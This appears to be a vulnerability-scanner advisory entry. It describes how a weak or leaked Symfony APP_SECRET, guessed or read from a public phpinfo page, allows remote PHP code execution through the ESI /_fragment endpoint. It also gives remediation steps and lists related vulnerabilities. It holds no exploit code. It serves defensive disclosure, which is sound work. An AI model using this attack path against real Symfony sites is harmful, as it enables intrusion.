Description
It was possible to guess/extract the Symfony's application secret (APP_SECRET). The secret was either guessed from a list of weak secrets or was extracted from the publicly accessible phpinfo page.
Using this secret it was possible to execute arbitrary PHP code using the ESI (Edge-Side Includes) functionality that is accessible at /_fragment.
Remediation
It's recommended to disable ESI (Edge-Side Includes) and to change the Symfony's application secret (APP_SECRET).
References
Related Vulnerabilities
WordPress 2.6.2 Remote Code Execution Vulnerability (0.70 - 2.6.2)
ColdFusion 8 FCKEditor file upload vulnerability
WordPress Plugin WordPress Social Sharing-Social Warfare Multiple Vulnerabilities (3.5.2)
Oracle Reports rwservlet vulnerabilities
WordPress Plugin Social Photo Gallery Remote Code Execution (1.0)